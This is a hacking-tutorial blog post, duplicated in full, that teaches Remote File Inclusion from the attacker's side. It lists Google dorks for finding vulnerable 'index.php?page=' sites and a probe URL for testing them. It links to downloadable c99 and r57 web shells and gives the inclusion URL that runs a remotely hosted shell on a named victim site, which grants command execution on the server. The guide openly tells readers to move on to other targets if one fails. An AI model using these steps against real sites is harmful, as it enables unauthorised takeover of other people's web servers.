(RFI Attack) Remote File Inclusion Attack.
Remote File Inclusion(RFI) is one of the most commonly used vulnerability's found on the web today. This allows us(the attacker) to put a remote file on the victims server. If we our successful in performing the attack, we will then have gained access to the victims sites web server and we will be able to execute any type of command we want on it.
Firstly, i will show you how to search for the RFI vulnerability(something i failed to do in the LFI lesson =P )
The Remote File Inclusion vulnerability nomrally occures in sites, that have a simlar navigation to the one listed below:
www.victimsite.com/index.php?page=*whatever can be here*
The easist way to find the vulnerability would be to use a google durk, that i provided below::
inurl:index.php?page=
inurl:view.php?page=
This will go ahead and show us pages in which "index.php?page=" or "view.php?page=" are in the URL, now the most easiest way to see if the site is vulnerable to Remote File Inclusion or not, would be to place "www.google.com" after the last
"=" sign, like so::
www.victimsite.com/index.php?page=www.google.com
Lets say that the target website is http://www. zhcsucks.com
So will make the url will become
http://www.zhcsucks.com/index.php?page=http://www.google.com
Now, that we have executed the "command" on the page, and if google shows up, thats when we known that the website is vulnerable to the RFI attack. Clearly, if google does not show up, move on to a different target site.
It is now time for us to upload a shell to the sever to gain access. The easist way of doing this is by using some of the most common shells around, c99 or r57(or you can use the shell that milan millo just relesed, however for this lesson, lets stick to c99 or r57, i will be using c99 for this example though(and i do prefer it over other shells), i have placed a link below to both c99 and r57 shells::
./c99::http://www.sh3ll.org/c99.txt?
./r57::http://www.sh3ll.org/r57.txt?
Now we need to upload the shell to a webhosting site, such as 110mb.com , htmlpaste.com or ripway.com.
/* If this is a issue for any of you, let me know and i will write a guild on how to do this */
/* you maybe able to use the links to the shells above, instead of using external webhosting, however, ive always done it with external webhosting */
Now that we have it uploaded, we will now need to execute the shell on the target site to gain access. For examaple if the the URL of the shell is::
http://www.examplehosting.com/haxs/c99.txt?
Then we would now have to execute the following url command as so to gain access to the victims site server(remember to ad a "?" at the end of the URL, very important that you do), it should like so::
http://www.zhcsucks.com/index.php?page=http://www.examplehosting.com/haxs/c99.txt?
Your shell should like the image below ::
http://i43.tinypic.com/ej7cl5.png
You have now excuted a shell on a target site.
/* There is many other tricks and ways of doing RFI, however is by far the simplest and easist way, i will relase the other ways in do time :) */
Remote File Inclusion(RFI) is one of the most commonly used vulnerability's found on the web today. This allows us(the attacker) to put a remote file on the victims server. If we our successful in performing the attack, we will then have gained access to the victims sites web server and we will be able to execute any type of command we want on it.
Firstly, i will show you how to search for the RFI vulnerability(something i failed to do in the LFI lesson =P )
The Remote File Inclusion vulnerability nomrally occures in sites, that have a simlar navigation to the one listed below:
www.victimsite.com/index.php?page=*whatever can be here*
The easist way to find the vulnerability would be to use a google durk, that i provided below::
inurl:index.php?page=
inurl:view.php?page=
This will go ahead and show us pages in which "index.php?page=" or "view.php?page=" are in the URL, now the most easiest way to see if the site is vulnerable to Remote File Inclusion or not, would be to place "www.google.com" after the last
"=" sign, like so::
www.victimsite.com/index.php?page=www.google.com
Lets say that the target website is http://www. zhcsucks.com
So will make the url will become
http://www.zhcsucks.com/index.php?page=http://www.google.com
Now, that we have executed the "command" on the page, and if google shows up, thats when we known that the website is vulnerable to the RFI attack. Clearly, if google does not show up, move on to a different target site.
It is now time for us to upload a shell to the sever to gain access. The easist way of doing this is by using some of the most common shells around, c99 or r57(or you can use the shell that milan millo just relesed, however for this lesson, lets stick to c99 or r57, i will be using c99 for this example though(and i do prefer it over other shells), i have placed a link below to both c99 and r57 shells::
./c99::http://www.sh3ll.org/c99.txt?
./r57::http://www.sh3ll.org/r57.txt?
Now we need to upload the shell to a webhosting site, such as 110mb.com , htmlpaste.com or ripway.com.
/* If this is a issue for any of you, let me know and i will write a guild on how to do this */
/* you maybe able to use the links to the shells above, instead of using external webhosting, however, ive always done it with external webhosting */
Now that we have it uploaded, we will now need to execute the shell on the target site to gain access. For examaple if the the URL of the shell is::
http://www.examplehosting.com/haxs/c99.txt?
Then we would now have to execute the following url command as so to gain access to the victims site server(remember to ad a "?" at the end of the URL, very important that you do), it should like so::
http://www.zhcsucks.com/index.php?page=http://www.examplehosting.com/haxs/c99.txt?
Your shell should like the image below ::
http://i43.tinypic.com/ej7cl5.png
You have now excuted a shell on a target site.
/* There is many other tricks and ways of doing RFI, however is by far the simplest and easist way, i will relase the other ways in do time :) */
0 commentaires:
Enregistrer un commentaire